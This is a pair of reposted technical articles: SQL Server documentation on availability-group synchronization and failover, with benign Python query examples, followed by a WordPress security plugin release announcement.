Once all of its databases are synchronized, a secondary replica enters the HEALTHY state. The synchronized secondary replica will remain healthy unless one of the following occurs:

  • A network or computer delay or glitch causes the session between the secondary replica and primary replica to time out. (For information about the session-timeout property of availability replicas, see Overview of Always On Availability Groups (SQL Server).)
  • You suspend a secondary database on the secondary replica. The secondary replica ceases to be synchronized, and its synchronization-health state is marked as NOT_HEALTHY. The secondary replica cannot become healthy again until the suspended secondary database is either resumed and resynchronized or removed from the availability group.
  • You add a primary database to the availability group. Previously synchronized secondary replicas enter the NOT_HEALTHY synchronization-health state. This state indicates that at least one database is in the NOT SYNCHRONIZING synchronization state. A given secondary replica cannot be HEALTHY again until a corresponding secondary database has been prepared on the replica, has been joined to the availability group, and has become synchronized with the new primary database.
  • You change the primary replica or the secondary replica to asynchronous-commit availability mode. After changing to asynchronous-commit mode, the secondary replica will remain in the HEALTHY synchronization-health state as long as data synchronization continues. However, if only the primary replica is changed to asynchronous-commit mode, the synchronous-commit secondary replica will enter the PARTIALLY_HEALTHY synchronization-health state. This state indicates that at least one database is in the SYNCHRONIZING synchronization state, but none of the databases are in the NOT SYNCHRONIZING state.
  • You change any secondary replica to synchronous-commit availability mode. This causes that secondary replica to be marked as in the PARTIALLY_HEALTHY synchronization-health state until all of its databases are in the SYNCHRONIZED synchronization state.

 Tip

To view the synchronization health of an availability group, availability replica, or availability database, query the synchronization_health or synchronization_health_desc column of sys.dm_hadr_availability_group_states, sys.dm_hadr_availability_replica_states, or sys.dm_hadr_database_replica_states, respectively.
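A minimal sketch of such a health check from Python, using pyodbc (the server name and ODBC driver in the connection string are placeholders):

```python
# Minimal sketch (placeholder connection details): reading replica-level
# synchronization health via the DMVs named in the tip above.
import pyodbc

QUERY = """
SELECT ag.name AS availability_group,
       ars.synchronization_health_desc
FROM sys.dm_hadr_availability_replica_states AS ars
JOIN sys.availability_groups AS ag
  ON ag.group_id = ars.group_id;
"""

conn = pyodbc.connect(
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=SQLNODE01;DATABASE=master;Trusted_Connection=yes;"
)
for group, health in conn.cursor().execute(QUERY):
    print(group, health)  # e.g., AG_Demo HEALTHY
conn.close()
```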

How Synchronization Works on a Secondary Replica

Under the synchronous-commit mode, after a secondary replica joins the availability group and establishes a session with the primary replica, the secondary replica writes incoming log records to disk (hardens the log) and sends a confirmation message to the primary replica. Once the hardened log on the secondary database has caught up to the end of the log on the primary database, the state of the secondary database is set to SYNCHRONIZED. The time required for synchronization depends essentially on how far the secondary database was behind the primary database at the start of the session (measured by the number of log records initially received from the primary replica), the workload on the primary database, and the speed of the computer of the server instance that hosts the secondary replica.

Synchronous operation is maintained in the following manner:

  1. On receiving a transaction from a client, the primary replica writes the log for the transaction to the transaction log and concurrently sends the log record to the secondary replicas.
  2. Once a log record is written to the transaction log of the primary database, the transaction can be undone only if there is a failover at this point to a secondary that did not receive the log. The primary replica waits for confirmation from the synchronous-commit secondary replica.
  3. The secondary replica hardens the log and returns an acknowledgement to the primary replica.
  4. On receiving the confirmation from the secondary replica, the primary replica finishes the commit processing and sends a confirmation message to the client. (Note: If a synchronous-commit secondary replica times out without confirming that it has hardened the log, the primary marks that secondary replica as failed. The connected state of the secondary replica changes to DISCONNECTED, and the primary replica stops waiting for confirmation from the secondary replica. This behavior ensures that a failed synchronous-commit secondary replica does not prevent hardening of the transaction log on the primary replica.)

Synchronous-commit mode protects your data by requiring the data to be synchronized between two places, at the cost of somewhat increasing the latency of the transaction.
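The following toy Python sketch (plain Python, not SQL Server code) mimics the four-step flow above: the primary confirms the commit to the client only after the synchronous-commit secondary acknowledges hardening the log, and a timed-out secondary is treated as DISCONNECTED rather than blocking the commit:

```python
# Toy illustration of the four-step synchronous-commit flow described above.
import queue
import threading

log_channel = queue.Queue()  # primary -> secondary: shipped log records
ack_channel = queue.Queue()  # secondary -> primary: hardening acknowledgements

def secondary_replica() -> None:
    record = log_channel.get()
    print(f"secondary: hardened {record!r}")  # step 3: harden, then ack
    ack_channel.put("ack")

threading.Thread(target=secondary_replica, daemon=True).start()

def primary_commit(record: str, session_timeout_s: float = 5.0) -> str:
    # Steps 1-2: write locally, ship the record, then wait for the ack.
    print(f"primary: wrote {record!r} locally and sent it to the secondary")
    log_channel.put(record)
    try:
        ack_channel.get(timeout=session_timeout_s)
    except queue.Empty:
        # Mirrors the note in step 4: a timed-out secondary is marked
        # DISCONNECTED so it cannot block commits on the primary.
        return "committed (secondary marked DISCONNECTED)"
    return "committed (synchronized)"  # step 4: ack received

print(primary_commit("INSERT ..."))
```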

Synchronous-Commit Mode with Only Manual Failover

When the primary replica and a synchronous-commit secondary replica are connected and the database is synchronized, manual failover is supported. If the secondary replica goes down, the primary replica is unaffected. The primary replica runs exposed if no SYNCHRONIZED replicas exist (that is, without sending data to any secondary replica). If the primary replica is lost, the secondary replicas enter the RESOLVING state, but the database owner can force a failover to a secondary replica (with possible data loss). For more information, see Failover and Failover Modes (Always On Availability Groups).

Synchronous-Commit Mode with Automatic Failover

Automatic failover provides high availability by ensuring that the database is quickly made available again after the loss of the primary replica. To configure an availability group for automatic failover, you need to set both the current primary replica and at least one secondary replica to synchronous-commit mode with automatic failover. You can have up to three automatic failover replicas.

Furthermore, for an automatic failover to be possible at a given time, this secondary replica must be synchronized with the primary replica (that is, the secondary databases are all synchronized), and the Windows Server Failover Clustering (WSFC) cluster must have quorum. If the primary replica becomes unavailable under these conditions, automatic failover occurs. The secondary replica switches to the role of primary, and it offers its database as the primary database. For more information, see the “Automatic Failover” section of the Failover and Failover Modes (Always On Availability Groups) topic.

 Note

For information about WSFC quorum and Always On availability groups, see WSFC Quorum Modes and Voting Configuration (SQL Server).
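Putting the two requirements together, a minimal sketch of the T-SQL that pairs synchronous commit with automatic failover on a replica, sent via pyodbc (all names are hypothetical; run it against the current primary):

```python
# Minimal sketch (hypothetical names): the two settings that must both be in
# place on a replica before it can be an automatic-failover partner. Apply
# the same pair to the primary replica itself as needed.
import pyodbc

STATEMENTS = [
    # Automatic failover requires synchronous commit...
    """ALTER AVAILABILITY GROUP [AG_Demo]
       MODIFY REPLICA ON N'SQLNODE02'
       WITH (AVAILABILITY_MODE = SYNCHRONOUS_COMMIT);""",
    # ...and the failover mode itself set to AUTOMATIC.
    """ALTER AVAILABILITY GROUP [AG_Demo]
       MODIFY REPLICA ON N'SQLNODE02'
       WITH (FAILOVER_MODE = AUTOMATIC);""",
]

conn = pyodbc.connect(
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=SQLNODE01;DATABASE=master;Trusted_Connection=yes;",
    autocommit=True,
)
cur = conn.cursor()
for stmt in STATEMENTS:
    cur.execute(stmt)
conn.close()
```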

Data latency on secondary replica

Implementing read-only access to secondary replicas is useful if your read-only workloads can tolerate some data latency. In situations where data latency is unacceptable, consider running read-only workloads against the primary replica.

The primary replica sends log records of changes on the primary database to the secondary replicas. On each secondary database, a dedicated redo thread applies the log records. On a read-access secondary database, a given data change does not appear in query results until the log record that contains the change has been applied to the secondary database and the transaction has been committed on the primary database.

This means that there is some latency, usually only a matter of seconds, between the primary and secondary replicas. In unusual cases, however, for example if network issues reduce throughput, latency can become significant. Latency increases when I/O bottlenecks occur and when data movement is suspended. To monitor suspended data movement, you can use the Always On Dashboard or the sys.dm_hadr_database_replica_states dynamic management view.

For more information on investigating redo latency on the secondary replica, please see Troubleshoot primary changes not reflected on secondary replica.
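To watch for suspended data movement and a growing redo backlog from a script, here is a hedged sketch querying that DMV (connection details are placeholders):

```python
# Minimal sketch (placeholder connection details): spotting suspended data
# movement and log/redo backlog per availability database.
import pyodbc

QUERY = """
SELECT DB_NAME(database_id) AS database_name,
       synchronization_state_desc,
       is_suspended,
       suspend_reason_desc,
       log_send_queue_size,  -- KB of log not yet sent to this replica
       redo_queue_size       -- KB of log received but not yet redone
FROM sys.dm_hadr_database_replica_states;
"""

conn = pyodbc.connect(
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=SQLNODE01;DATABASE=master;Trusted_Connection=yes;"
)
for row in conn.cursor().execute(QUERY):
    print(tuple(row))
conn.close()
```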

Related Tasks

  • To change the availability mode and failover mode
  • To adjust quorum votes
  • To perform a manual failover
  • To view availability group, availability replica, and database states

See Also

Overview of Always On Availability Groups (SQL Server)
Failover and Failover Modes (Always On Availability Groups)
Windows Server Failover Clustering (WSFC) with SQL Server

Source :
https://docs.microsoft.com/en-us/sql/database-engine/availability-groups/windows/availability-modes-always-on-availability-groups?view=sql-server-ver16

WP Shield Security PRO – Release 16.1

It’s been a few months in the making, but it’s finally here – our most exciting release (yet again!) of Shield Security for WordPress.

This release is absolutely packed with goodies and our headline feature – integration with CrowdSec – deserves an article all to itself.

Here you’ll discover all the exciting things we’ve packed into ShieldPRO v16 and why you should be upgrading as soon as it’s out.

Let’s dig into all the new goodies…

#1 Partnership with CrowdSec for Crowd-Sourced IP Intelligence

This is, to our mind, one of the most exciting developments for WordPress security for a very long time.

We’ve wanted to achieve this level of protection against bots for years, as we firmly believe that good WordPress security starts with intelligently blocking malicious IP addresses.

Shield does an effective job of this already with its automatic block list system, but we’ve now achieved group intelligence so all WordPress sites running on Shield will benefit from the experiences of all the other websites running Shield.

This is a big topic so we’ve dedicated a whole article to it – learn about the new partnership here.

#2 Brand New IP Rules and Blocking Engine

IP Blocking has been a part of ShieldPRO, practically from the outset. It’s core to our WordPress security philosophy.

With such a long-standing feature, you can imagine that the knowledge and experience used to create that original system wasn’t as thorough as what we have today. We’ve come a long way, I can promise you.

This release, spurred on by the new CrowdSec integration, sees the much-needed overhaul of our IP management system. It’s smarter and more versatile, and altogether much faster!

Shield must look up a visitor’s IP address on every single request to a WordPress site. If we can improve the speed of that lookup, we improve Shield’s performance overall.

#3 Improved UI

Shield has a number of different subsystems, many of which are related. The scan results page is linked to the scanner configuration page, for example.

To date, when you wanted to view any section of the plugin, it would reload the entire page. We’ve done some work to reduce full page reloads so that you can stay “where you are” while viewing the contents of another page.

In particular we’re referring to “Configuration” pages. Links to such areas will now open in an overlay, letting you keep your current page active while you review and adjust settings.

Another UI enhancement is a new title bar across every page of the plugin, letting you see more clearly where you are, along with important links to help resources.

This title bar also includes our brand new “super search box”…

#4 Shield’s Super Search Box

We mentioned UI improvements already, but this deserves a section all to itself.

To say Shield is a large plugin is understating it. There are many options pages, as well as tools, tables, data, charts, etc.

Finding your way around can be a bit tricky. Since we built it, we know it inside out. But for everyone who uses it as a tool to protect their sites, it’s not always obvious where to go to find the “thing” you need.

No longer!

With Shield’s “Super Search Box”, you can find almost anything you need, and jump directly to it. Currently you can search for:

  • Specific configuration options
  • Tools such as Import/Export, Admin Notes, Debug
  • Logs such as Activity Logs and Traffic Logs
  • IP Rules
  • IP addresses – it’ll open a popup to review the data Shield holds on any particular IP
  • External links such as Shield’s homepage, Facebook page, helpdesk, CrowdSec, etc.

We’ll develop this a bit more over time as we get feedback from you on what you’d like to see in there.

#5 Lighter, Faster Scan Results Display

Shield’s scans can turn up a lot of results and some customers have reported trouble on some servers with limited resources.

We’ve redesigned how the scan results are built, so it’s faster and lighter on both your browser and the WordPress server.

#6 Improved Human SPAM Detection

After working with a customer on some issues she faced with Human SPAM, we’ve developed enhancements to how Shield will detect repeated human spam comments.

For example, a spammer may post a comment and trigger our human SPAM scanner, but then fire off more comments that might bypass the same scanner. We’ll now use previous SPAM detections by Shield to inform how future comments are handled, too.

We also squashed a bug where Shield wasn’t properly honouring the “disallowed keywords” option built into WordPress itself.

#7 Custom Activity Logs and Events

Shield covers a lot of areas when it comes to monitoring events that happen on a WordPress site. But we typically don’t cover 3rd party plugins.

So, based on the feedback from a number of interested customers, we’ve added the ability for any PHP developer to add custom events to Shield’s Activity Logs.

When might you find that useful?

You could, for example, track WooCommerce orders, or you could be facing a particularly menacing visitor who repeats an undesirable action on your site that’s not covered by Shield, and decide to block their IP.

You can do whatever you want with this, though you should always take care when allocating offenses to actions as you may inadvertently block legitimate users.

#8 All-New Guided Setup Wizard

Installing a platform like Shield Security for WordPress for the first time can be a little overwhelming. Shield is a large plugin, with many features, tools, and options.

We’ve had a “Welcome Wizard” in Shield for a while, but it was a little rough around the edges. For this release we decided to revamp it and provide a new guided setup wizard, helping newcomers get up-to-speed more quickly.

Anyone can access the Guided Setup from the Super Search Box (search: “Wizard”), or from the Shield > Tools menu.

A Change To Minimum Supported WordPress Version

We try to make Shield Security as backward-compatible as possible, while it makes sense to do so.

However, this means that our code development and testing must reflect this, and the burden of support increases the farther back we support older versions.

Our Telemetry data suggests that there are no WordPress sites below version 4.7 running the Shield plugin. Of course, we can only go on what data has been sent to us. But we have to draw the line somewhere, and with Shield v16, we’re drawing the line at WordPress 4.7.

As more data comes through and time marches on, we’ll gradually increase our minimum requirements, so we strongly suggest you keep your WordPress sites and hosting platforms as up to date as possible.

Comments, Feedback and Suggestions

A lot of work has gone into this release that will, we hope, improve security for all users by making it much easier to see what’s going on and what areas need improvement. The Security Rules Engine is one of our most exciting developments to date, and we can hardly wait to get the first iteration into your hands and start further development on it.

As always, we welcome your thoughts and feedback so please do feel free to leave your comments and suggestions below.

Source :
https://getshieldsecurity.com/blog/wp-shield-security-pro-release-16-1/